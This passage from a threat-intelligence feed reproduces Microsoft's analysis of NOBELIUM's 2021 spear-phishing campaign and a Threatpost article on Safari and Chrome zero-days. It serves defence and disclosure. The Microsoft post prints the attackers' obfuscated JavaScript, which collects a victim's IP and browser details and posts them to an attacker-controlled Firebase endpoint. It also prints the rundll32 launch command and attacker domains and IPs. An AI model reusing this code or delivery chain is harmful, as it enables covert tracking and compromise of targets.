Container](<https://attack.mitre.org/techniques/T1610/>)\u2014Payload is delivered via an ISO file which is mounted on target computers.\n * [T1204.001 User Execution: Malicious Link](<https://attack.mitre.org/techniques/T1204/001/>)\u2014Cobalt Strike Beacon payload is executed via a malicious link (LNK) file.\n\n### Command and control\n\n * [T1071.001 Application Layer Protocol: Web Protocols](<https://attack.mitre.org/techniques/T1071/001/>)\u2014Cobalt Strike Beacons call out to attacker infrastructure via port 443.\n\n## Learn more\n\nTo learn more about Microsoft Security solutions, [visit our website](<https://www.microsoft.com/en-us/security/business>). Bookmark the [Security blog](<https://www.microsoft.com/security/blog/>) to keep up with our expert coverage on security matters. Also, follow us at [@MSFTSecurity](<https://twitter.com/@MSFTSecurity>) for the latest news and updates on cybersecurity.\n\nThe post [New sophisticated email-based attack from NOBELIUM](<https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-05-28T00:00:50", "type": "mmpc", "title": "New sophisticated email-based attack from NOBELIUM", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1879"], "modified": "2021-05-28T00:00:50", "id": "MMPC:6A79615935EB4546087AB44569C7B207", "href": "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "mssecure": [{"lastseen": "2021-06-01T20:24:48", "description": "Microsoft Threat Intelligence Center (MSTIC) has uncovered a wide-scale malicious email campaign operated by NOBELIUM, the threat actor behind the attacks against SolarWinds, the [SUNBURST backdoor](<https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/>), [TEARDROP malware](<https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/>), [GoldMax malware](<https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/>), and other related components. The campaign, initially observed and tracked by Microsoft since January 2021, evolved over a series of waves demonstrating significant experimentation. On May 25, 2021, the campaign escalated as NOBELIUM leveraged the legitimate mass-mailing service, [Constant Contact](<https://www.constantcontact.com/>), to masquerade as a US-based development organization and distribute malicious URLs to a wide variety of organizations and industry verticals.\n\nMicrosoft is issuing this alert and new security research regarding this sophisticated [email-based campaign that NOBELIUM has been operating](<https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/>) to help the industry understand and protect from this latest activity. Below, we have outlined attacker motives, malicious behavior, and best practices to protect against this attack. You can also find more information on the [Microsoft On The Issues blog](<https://blogs.microsoft.com/on-the-issues/?p=64692>).\n\n> Note: This is an active incident. We will post more details here as they become available.\n> \n> _**Update [05/28/2021]**: We published a new blog post detailing [NOBELIUM's latest early-stage toolset](<https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/>), composed of four tools utilized in a unique infection chain: EnvyScout, BoomBox, NativeZone, and VaporRage. _\n\nNOBELIUM has historically targeted government organizations, non-government organizations (NGOs), think tanks, military, IT service providers, health technology and research, and telecommunications providers. With this latest attack, NOBELIUM attempted to target approximately 3,000 individual accounts across more than 150 organizations, employing an [established pattern](<https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/>) of using unique infrastructure and tooling for each target, increasing their ability to remain undetected for a longer period of time.\n\nThis new wide-scale email campaign leverages the legitimate service Constant Contact to send malicious links that were obscured behind the mailing service\u2019s URL (many email and document services provide a mechanism to simplify the sharing of files, providing insights into who and when links are clicked). Due to the high volume of emails distributed in this campaign, automated email threat detection systems blocked most of the malicious emails and marked them as spam. However, some automated threat detection systems may have successfully delivered some of the earlier emails to recipients either due to configuration and policy settings or prior to detections being in place.\n\n[Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) delivers coordinated defense against this threat. [Microsoft Defender for Office 365](<https://www.microsoft.com/en-us/microsoft-365/security/office-365-defender>) detects the malicious emails, and [Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>) detects the malware and malicious behaviors. Due to the fast-moving nature of this campaign and its perceived scope, Microsoft encourages organizations to investigate and monitor communications matching characteristics described in this report and take the actions described below in this article.\n\nWe continue to see an increase in sophisticated and [nation-state-sponsored attacks](<https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/>) and, as part of our ongoing threat research and efforts to protect customers, we will continue to [provide guidance](<https://blogs.microsoft.com/on-the-issues/2020/12/13/customers-protect-nation-state-cyberattacks/>) to the security community on how to secure against and respond to these multi-dimensional attacks.\n\n## Spear-phishing campaign delivers NOBELIUM payloads\n\nThe NOBELIUM campaign observed by MSTIC and detailed in this blog differs significantly from the NOBELIUM operations that ran from September 2019 until January 2021, which included the compromise of the SolarWinds Orion platform. It is likely that these observations represent changes in the actor\u2019s tradecraft and possible experimentation following widespread disclosures of previous incidents. \n\n### Early testing and initial discovery\n\nAs part of the initial discovery of the campaign in February, MSTIC identified a wave of phishing emails that leveraged the Google Firebase platform to stage an ISO file containing malicious content, while also leveraging this platform to record attributes of those who accessed the URL. MSTIC traced the start of this campaign to January 28, 2021, when the actor was seemingly performing early reconnaissance by only sending the tracking portion of the email, leveraging Firebase URLs to record targets who clicked. No delivery of a malicious payload was observed during this early activity.\n\n### Evolving delivery techniques\n\nIn the next evolution of the campaign, MSTIC observed NOBELIUM attempting to compromise systems through an HTML file attached to a spear-phishing email. When opened by the targeted user, a JavaScript within the HTML wrote an ISO file to disc and encouraged the target to open it, resulting in the ISO file being mounted much like an external or network drive. From here, a shortcut file (LNK) would execute an accompanying DLL, which would result in Cobalt Strike Beacon executing on the system.\n\n\n\n_Figure 1. Example Flow of HMTL/ISO infection chain._\n\nHere's an example of target fingerprinting code leveraging Firebase:\n\n`try { \nlet sdfgfghj = ''; \nlet kjhyui = new XMLHttpRequest(); \nkjhyui.open('GET', 'https://api.ipify.org/?format=jsonp?callback=?', false); \nkjhyui.onreadystatechange = function (){ \nsdfgfghj = this.responseText; \n} \nkjhyui.send(null); \nlet ioiolertsfsd = navigator.userAgent; \nlet uyio = window.location.pathname.replace('/',''); \nvar ctryur = {'io':ioiolertsfsd,'tu':uyio,'sd':sdfgfghj}; \nctryur = JSON.stringify(ctryur); \nlet sdfghfgh = new XMLHttpRequest(); \nsdfghfgh.open('POST', 'https://eventbrite-com-default-rtdb.firebaseio.com/root.json', false); \nsdfghfgh.setRequestHeader('Content-Type', 'application/json'); \nsdfghfgh.send(ctryur); \n} catch (e) {}`\n\nSimilar spear-phishing campaigns were detected throughout March, which included the NOBELIUM actor making several alterations to the accompanying HTML document based on the intended target. MSTIC also observed the actor experimenting with removing the ISO from Firebase, and instead encoding it within the HTML document. Similarly, the actor experimented with redirecting the HTML document to an ISO, which contained an RTF document, with the malicious Cobalt Strike Beacon DLL encoded within the RTF. In one final example of experimentation, there was no accompanying HTML in the phishing email and instead a URL led to an independent website spoofing the targeted organizations, from where the ISO was distributed.\n\nThe phishing message and delivery method was not the only evolving factor in the campaign. In one of the more targeted waves, no ISO payload was delivered, but additional profiling of the target device was performed by an actor-controlled web server after a user clicked the link. If the device targeted was an Apple iOS device, the user was redirected to another server under NOBELIUM control, where the since-patched zero-day exploit for CVE-2021-1879 was served.\n\n### Escalated targeting and delivery\n\nExperimentation continued through most of the campaign but began to escalate in April 2021. During the waves in April, the actor abandoned the use of Firebase, and no longer tracked users using a dedicated URL. Their techniques shifted to encode the ISO within the HTML document and have that responsible for storing target host details on a remote server via the use of the _api.ipify.org_ service. The actor sometimes employed checks for specific internal Active Directory domains that would terminate execution of the malicious process if it identified an unintended environment.\n\nIn May 2021, the actor changed techniques once more by maintaining the HTML and ISO combination, but dropped a custom .NET first-stage implant, detected as TrojanDownloader:MSIL/BoomBox, that reported host-based reconnaissance data to, and downloaded additional payloads from, the Dropbox cloud storage platform.\n\nOn May 25, the NOBELIUM campaign escalated significantly. Using the legitimate mass mailing service Constant Contact, NOBELIUM attempted to target around 3,000 individual accounts across more than 150 organizations. Due to the high-volume campaign, automated systems blocked most of the emails and marked them as spam. However, automated systems might have successfully delivered some of the earlier emails to recipients.\n\nIn the May 25 campaign, there were several iterations. In one example the emails appear to originate from USAID _<ashainfo@usaid.gov>,_ while having an authentic sender email address that matches the standard Constant Contact service. This address (which varies for each recipient) ends in _@in.constantcontact.com_, and (which varies for each recipient), and a Reply-To address of <_mhillary@usaid.gov>_ was observed. The emails pose as an alert from USAID, as seen below.\n\n\n\n_Figure 2. Example email screenshot._\n\nIf the user clicked the link on the email, the URL directs them to the legitimate Constant Contact service, which follows this pattern:\n\n_https://r20.rs6[.]net/tn.jsp?f=_\n\nThe user is then redirected to NOBELIUM-controlled infrastructure, with a URL following this pattern:\n\n_https://usaid.theyardservice[.]com/d/<target_email_address>_\n\nA malicious ISO file is then delivered to the system. Within this ISO file are the following files that are saved in the _%USER%\\__AppData\\Local\\Temp\\<random folder name>\\_ path:\n\n * A shortcut, such as _Reports.lnk_, that executes a custom Cobalt Strike Beacon loader\n * A decoy document, such as _ica-declass.pdf_, that is displayed to the target\n * A DLL, such as _Document.dll_, that is a custom Cobalt Strike Beacon loader dubbed NativeZone by Microsoft\n\n\n\n_Figure 3. ISO file contents. It is worth noting that the \u201cDocuments.dll\u201d is a hidden file._\n\n\n\n_Figure 4. Shortcut which executes the hidden DLL file._\n\nThe end result when detonating the LNK file is the execution of \u201cC:\\Windows\\system32\\rundll32.exe Documents.dll,Open\u201d.\n\nThe successful deployment of these payloads enables NOBELIUM to achieve persistent access to compromised systems. Then, the successful execution of these malicious payloads could enable NOBELIUM to conduct action-on objectives, such as lateral movement, data exfiltration, and delivery of additional malware.\n\nIndicators of compromise (IOCs) for the campaign occurring on May 25 are provided in this blog to help security teams to identify actor activity.\n\nMicrosoft security researchers assess that the NOBELIUM\u2019s spear-phishing operations are recurring and have increased in frequency and scope. It is anticipated that additional activity may be carried out by the group using an evolving set of tactics.\n\nMicrosoft continues to monitor this threat actor\u2019s evolving activities and will update as necessary. [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) protects customers against the multiple components of this threat: malicious emails, file attachments, connections, malware payloads, other malicious artifacts, and attacker behavior. Refer to the detection details below for specific detection names and alerts. Additionally, customers should follow defensive guidance and leverage advanced hunting to help mitigate variants of actor activity.\n\n## Mitigations\n\nApply these mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.\n\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Run [EDR in block mode ](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>)so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. (EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.)\n * Enable [network protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide>) to prevent applications or users from accessing malicious domains and other malicious content on the internet.\n * Enable[ investigation and remediation](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.\n * Use [device discovery ](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>)to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.\n * Enable multifactor authentication (MFA) to mitigate compromised credentials. Microsoft strongly encourages all customers download and use passwordless solutions like Microsoft Authenticator to [secure your accounts](<https://www.microsoft.com/en-us/account/authenticator/>).\n * For Office 365 users, see [multifactor authentication support](<https://docs.microsoft.com/en-us/microsoft-365/admin/security-and-compliance/set-up-multi-factor-authentication?view=o365-worldwide&viewFallbackFrom=o365worldwide>).\n * For Consumer and Personal email accounts, see how to use [two-step verification](<https://support.microsoft.com/en-us/account-billing/how-to-use-two-step-verification-with-your-microsoft-account-c7910146-672f-01e9-50a0-93b4585e7eb4>).\n * Turn on the following [attack surface reduction rule](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>) to block or audit activity associated with this threat: _Block all Office applications from creating child processes_. NOTE: [Assess rule impact](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/evaluate-attack-surface-reduction?view=o365-worldwide>) before deployment.\n\n## Indicators of compromise (IOC)\n\nThis attack is still active, so these indicators should not be considered exhaustive for this observed activity. These indicators of compromise are from the large-scale campaign launched on May 25, 2021.\n\n \n\nINDICATOR | TYPE | DESCRIPTION \n---|---|--- \nashainfo@usaid.gov | Email | Spoofed email account \nmhillary@usaid.gov | Email | Spoofed email account \n2523f94bd4fba4af76f4411fe61084a7e7d80dec163c9ccba9226c80b8b31252 | SHA-256 | Malicious ISO file (container) \nd035d394a82ae1e44b25e273f99eae8e2369da828d6b6fdb95076fd3eb5de142 | SHA-256 | Malicious ISO file (container) \n94786066a64c0eb260a28a2959fcd31d63d175ade8b05ae682d3f6f9b2a5a916 | SHA-256 | Malicious ISO file (container) \n48b5fb3fa3ea67c2bc0086c41ec755c39d748a7100d71b81f618e82bf1c479f0 | SHA-256 | Malicious shortcut (LNK) \nee44c0692fd2ab2f01d17ca4b58ca6c7f79388cbc681f885bb17ec946514088c | SHA-256 | Cobalt Strike Beacon malware \nee42ddacbd202008bcc1312e548e1d9ac670dd3d86c999606a3a01d464a2a330 | SHA-256 | Cobalt Strike Beacon malware \nusaid.theyardservice[.]com | Domain | Subdomain used to distribute ISO file \nworldhomeoutlet[.]com | Domain | Subdomain in Cobalt Strike C2 \ndataplane.theyardservice[.]com | Domain | Subdomain in Cobalt Strike C2 \ncdn.theyardservice[.]com | Domain | Subdomain in Cobalt Strike C2 \nstatic.theyardservice[.]com | Domain | Subdomain in Cobalt Strike C2 \n192[.]99[.]221[.]77 | IP address | IP resolved to by _worldhomeoutlet[.]com_ \n83[.]171[.]237[.]173 | IP address | IP resolved to by *_theyardservice[.]com_ \ntheyardservice[.]com | Domain | Actor controlled domain \n \n## Detection details\n\n### Antivirus\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * [Trojan:Win32/NativeZone.C!dha](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/NativeZone.C!dha&threatId=-2147185566>)\n\n### Endpoint detection and response (EDR)\n\nAlerts with the following titles in the Security Center can indicate threat activity on your network:\n\n * Malicious ISO File used by NOBELIUM\n * Cobalt Strike Beacon used by NOBELIUM\n * Cobalt Strike network infrastructure used by NOBELIUM\n\nThe following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\n * An uncommon file was created and added to startup folder.\n * A link file (LNK) with unusual characteristics was opened.\n\n## Advanced hunting\n\n### Microsoft 365 Defender\n\n**NOTE:** The following sample queries lets you search for a week's worth of events. To explore up to 30 days\u2019 worth of raw data to inspect events in your network and locate potential NOBELIUM mass email-related indicators for more than a week, go to the **Advanced Hunting** page > **Query** tab, select the calendar drop-down menu to update your query to hunt for the **Last 30 days**.\n\nTo locate possible exploitation activity, run the following query in the Microsoft 365 security center:\n\n##### NOBELIUM abuse of USAID Constant Contact resources in email data\n\nLooks for recent emails to the organization that originate from the original Constant Contact sending infrastructure and specifically from the organization that had accounts spoofed or compromised in the campaign detailed in this report. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAI2QzQqCUBCFzzroHURaS7Ro5y6DFraJHkDUzH6uoJabHr7PMWojIQN3fs-ZMzfSXYlK3XRUzbuT00mVPM010wvf6aycXk48zGzoDyhHLcQ8-XRWWirAN1rjHYiW-o_pAm7AXM1nIHvvjN9T9NUS6UnNgW-oV4ZZUM_R1sK9N-6OTg1XTNZgiQqinfGGzNdwFaifghi_92AqMsvjj7YtcX__-C_0WaDUNDdsTOyKIe-z1NSkhvUnbP2_7WE3lMwGXFLxa77e-0liDdIBAAA&runQuery=true&timeRangeId=week> \"https://security.microsoft.com/hunting?query=h4siaaaaaaaeai2qzqqcubcfzzrohuras7ro5y6dfrajhkduzh6uojabhr7pmwojiqn3fs-zmzfsxylk3xruzbut00mvpm010wvf6aycxk48zgzodyhhlcq8-xrwwiran1rjhyiw-o_pam7axm1nihvvjn9t9nus6unngw-ov4zzum_r1sk9n-6otg1xtnzgiqqinfggzndwfaifghi_92aqmsvjj7ytcx__-c_0wadunddstoykie-z1nskhvunbp2_7we3lmwgxflxa77e-0liddibaaa&runquery=true&timerangeid=week\" )\n\n`EmailUrlInfo \n| where UrlDomain == \"r20.rs6.net\" \n| join kind=inner EmailEvents on $left.NetworkMessageId==$right.NetworkMessageId \n| where SenderMailFromDomain == \"in.constantcontact.com\" \n| where SenderFromDomain == \"usaid.gov\" `\n\n##### NOBELIUM subject lines used in abuse of Constant Contact service\n\nLooks for recent emails to the organization that originate from the original Constant Contact sending infrastructure and specifically from the organization that had accounts spoofed or compromised in the campaign detailed in this report. It also specifies email subject keywords seen in phishing campaigns in late May using the term \u201cSpecial Alert!\u201d in various ways in the subject. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAI2SS2vCQBSFz1rofwihiwoSpItuiguhCi7sRruWaX1UjRNJYkXoj-83d6RkYUoJw32eM-feTK6VaiWa6aR37Yg-iOfYUgdVVAacoxz5vRbYks_pQvZBKbijYbbkcuIeZ4gX8DV-V8-6U0cj2Bxdud6o5JrIa63Cat9wnfVpmBV-7HihGjHeVAQdKZVH9ZVhKz1hvelPf3l2oCJib3YJLlhv7ElDx0hf5DzoMGVhmHtTviaX6dWYz1RKuKZEFZ_TBm9ivAP6S7g2aP8P4tasM9OwtHh6VTbGD7Pf3kCIMjYeFFfc52yGGNf2n-pr_dDYS9udf991Mv1bejOmKNhYG2Pz9SRUHMiFaYsvpe19dfUDjw6wVYICAAA&runQuery=true&timeRangeId=week> \"https://security.microsoft.com/hunting?query=h4siaaaaaaaeai2ss2vcqbsfz1rofwihiwospituiguhci7srruwax1ujrnjykxoj-83d6rkyuojw32em-fetk6vaiwa6ar37yg-iofyugdvvaacoxz5vrbyks_pqvzbkbijybbkcuiez4gx8dv-v8-6u0cj2bxdud6o5jria63cat9wnfvpmbv-7hihgjhevaqdkzvh9zvhkz1hvelpf3l2ocjib3yjllhv7eldx0hf5dzomgvhmhttviax6dwyz1rkukzefz_tbm9ivap6s7g2ap8p4tasm9owthh6vtbgd7pf3kcimjyefffc52yggnf2n-pr_ddys9udf991mv1bejomknhyg2pz9sruhmifaysvpe19dfudjw6wvyicaaa&runquery=true&timerangeid=week\" )\n\n`let SubjectTerms = pack_array (\"Special\",\"Alert\"); \nEmailUrlInfo \n| where UrlDomain == \"r20.rs6.net\" \n| join kind=inner EmailEvents on $left.NetworkMessageId==$right.NetworkMessageId \n| where SenderMailFromDomain == \"in.constantcontact.com\" \n| where SenderFromDomain == \"usaid.gov\" \n| where Subject has_any (SubjectTerms) `\n\n### Azure Sentinel\n\n##### NOBELIUM exploitation search using Azure Sentinel\n\nTo locate possible exploitation activity using Azure Sentinel, customers can find a Sentinel query containing these indicators in this [GitHub repository](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/NOBELIUM_IOCsMay2021.yaml> \"https://github.com/azure/azure-sentinel/blob/master/detections/multipledatasources/nobelium_iocsmay2021.yaml\" ).\n\n## MITRE ATT&CK techniques observed\n\nThis threat makes use of attacker techniques documented in the [MITRE ATT&CK framework](<https://attack.mitre.org/>).\n\n### Initial access\n\n * [T1566.003 Phishing: Spearphishing via Service](<https://attack.mitre.org/techniques/T1566/003/>)\u2014NOBELIUM used the legitimate mass mailing service, Constant Contact to send their emails.\n * [T1566.002 Phishing: Spearphishing Link](<https://attack.mitre.org/techniques/T1566/002/>)\u2014The emails sent by NOBELIUM includes a URL that directs a user to the legitimate Constant Contact service that redirects to NOBELIUM-controlled infrastructure.\n\n### Execution\n\n * [T1610 Deploy Container](<https://attack.mitre.org/techniques/T1610/>)\u2014Payload is delivered via an ISO file which is mounted on target computers.\n * [T1204.001 User Execution: Malicious Link](<https://attack.mitre.org/techniques/T1204/001/>)\u2014Cobalt Strike Beacon payload is executed via a malicious link (LNK) file.\n\n### Command and control\n\n * [T1071.001 Application Layer Protocol: Web Protocols](<https://attack.mitre.org/techniques/T1071/001/>)\u2014Cobalt Strike Beacons call out to attacker infrastructure via port 443.\n\n## Learn more\n\nTo learn more about Microsoft Security solutions, [visit our website](<https://www.microsoft.com/en-us/security/business>). Bookmark the [Security blog](<https://www.microsoft.com/security/blog/>) to keep up with our expert coverage on security matters. Also, follow us at [@MSFTSecurity](<https://twitter.com/@MSFTSecurity>) for the latest news and updates on cybersecurity.\n\nThe post [New sophisticated email-based attack from NOBELIUM](<https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-05-28T00:00:50", "type": "mssecure", "title": "New sophisticated email-based attack from NOBELIUM", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1879"], "modified": "2021-05-28T00:00:50", "id": "MSSECURE:6A79615935EB4546087AB44569C7B207", "href": "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "threatpost": [{"lastseen": "2021-07-15T11:25:30", "description": "Threat actors used a Safari zero-day flaw to send malicious links to government officials in Western Europe via LinkedIn before researchers from Google discovered and reported the vulnerability.\n\nThat\u2019s the word from researchers from Google Threat Analysis Group (TAG) and Google Project Zero, who Wednesday [posted a blog](<https://blog.google/threat-analysis-group/how-we-protect-users-0-day-attacks/>) shedding more light on several zero-day flaws that they discovered so far this year. Researchers in particular detailed how attackers exploited the vulnerabilities\u2014the prevalence of which are on the rise\u2013before they were addressed by their respective vendors.\n\nTAG researchers discovered the Safari WebKit flaw, tracked as [CVE-\u200b2021-1879](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1879>), on March 19. The vulnerability allowed for the processing of maliciously crafted web content for universal cross site scripting and was addressed by Apple in [an update](<https://support.apple.com/en-us/HT212256>) later that month.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nBefore the fix, researchers assert Russian-language threat actors were exploiting the vulnerability in the wild by using LinkedIn Messaging to send government officials from Western European countries malicious links that could collect website-authentication cookies, according to the post by Maddie Stone and Clement Lecigne from Google TAG.\n\n\u201cIf the target visited the link from an iOS device, they would be redirected to an attacker-controlled domain that served the next-stage payloads,\u201d they wrote.\n\nThe exploit, which targeted iOS versions 12.4 through 13.7, would turn off [Same-Origin-Policy](<https://en.wikipedia.org/wiki/Same-origin_policy>) protections on an infected device to collect authentication cookies from several popular websites\u2013including Google, Microsoft, LinkedIn, Facebook and Yahoo\u2013and then send them via WebSocket to an attacker-controlled IP, researchers wrote. The victim would need to have a session open on these websites from Safari for cookies to be successfully exfiltrated.\n\nMoreover, the campaign targeting iOS devices coincided with others from the same threat actor\u2014which Microsoft has identified as Nobelium\u2013targeting users on Windows devices to deliver Cobalt Strike, researchers wrote. Security firm Volexity described one of these attacks [in a report](<https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/>) posted online in May, the researchers added.\n\nNobellium is believed to be a Russia-based threat group responsible for the [expansive cyber-espionage SolarWinds](<https://threatpost.com/feds-russia-culprit-solarwinds/162785/>) campaign, which affected numerous U.S. government agencies and tech companies, including Microsoft.\n\n## **Other Zero-Day Attacks**\n\nGoogle researchers also linked three additional zero-day flaws they identified this year to a commercial surveillance vendor, according to [Google TAG\u2019s Shane Huntley](<https://twitter.com/ShaneHuntley/status/1415340345500463113>). Two of those vulnerabilities\u2013[CVE-2021-21166](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21166>) and [CVE-2021-30551](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30551>)\u2014were found in Chrome, and one, tracked as [CVE-2021-33742](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33742>), in Internet Explorer.\n\nCVE-2021-21166 and CVE-2021-30551, two Chrome rendered remote-code execution (RCE) flaws, were identified separately but later believed to be used by the same actor, researchers wrote in the blog. Google researchers discovered the former in February and the latter in June.\n\n\u201cBoth of these 0-days were delivered as one-time links sent by email to the targets, all of whom we believe were in Armenia,\u201d Stone and Lecigne wrote. \u201cThe links led to attacker-controlled domains that mimicked legitimate websites related to the targeted users.\u201d\n\nWhen prospective victims clicked the link, they were redirected to a webpage that would fingerprint their device, collect system information about the client, and generate ECDH keys to encrypt the exploits, researchers wrote. This info\u2014which included screen resolution, timezone, languages, browser plugins, and available MIME types\u2014would then be sent back to the exploit server and used by attackers to decide whether or not an exploit should be delivered to the target, they said.\n\nResearchers also identified a separate campaigned in April that also targeted Armenian users by leveraging CVE-2021-26411, an RCE bug found in Internet Explorer (IE). The campaign loaded web content within IE that contained malicious Office documents, researchers wrote.\n\n\u201cThis happened by either embedding a remote ActiveX object using a Shell.Explorer.1 OLE object or by spawning an Internet Explorer process via VBA macros to navigate to a web page,\u201d Stone and Lecigne explained.\n\nAt the time, researchers said they were unable to recover the next-stage payload, but successfully recovered the exploit after discovering an early June campaign from the same actors. Microsoft patched the flaw later that month, they said.\n\n\n\nClick to Zoom CREDIT: TAG\n\n## **Why There is an Increase in Zero-Days?**\n\nAll in all, security researchers have identified 33 [zero-day flaws](<https://threatpost.com/kaseya-patches-zero-days-revil-attacks/167670/>) so far in 2021, which is 11 more than the total number from 2020, according to the post.\n\nWhile that trend reflects an increase in the number of these types of vulnerabilities that exist, Google researchers \u201cbelieve greater detection and disclosure efforts are also contributing to the upward trend,\u201d they wrote.\n\nStill, it\u2019s highly possible that attackers are indeed using more [zero-day exploits](<https://threatpost.com/zero-day-wipe-my-book-live/167422/>) for a few reasons, researchers noted. One is that the increase and maturation of security technologies and features means attackers also have to level up, which in turn requires more [zero-day vulnerabilities](<https://threatpost.com/solarwinds-hotfix-zero-day-active-attack/167704/>) for functional attack chains, they said.\n\nThe growth of mobile platforms also has resulted in an increase in the number of products that threat actors want to target\u2014hence more reason to use zero-day exploits, researchers observed. Perhaps inspired by this increase in demand, commercial vendors also are selling more access to zero-days than in the early 2010s, they said.\n\nFinally, the maturation of security protections and strategies also inspires sophistication on the part of attackers as well, boosting the need for them to use zero-day flaws to convince victims to install malware, researchers noted.\n\n\u201cDue to advancements in security, these actors now more often have to use 0-day exploits to accomplish their goals,\u201d Stone and Lecigne wrote.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-15T11:04:49", "type": "threatpost", "title": "Safari Zero-Day Used in Malicious LinkedIn Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1879", "CVE-2021-21166", "CVE-2021-26411", "CVE-2021-30551", "CVE-2021-33742"], "modified": "2021-07-15T11:04:49", "id": 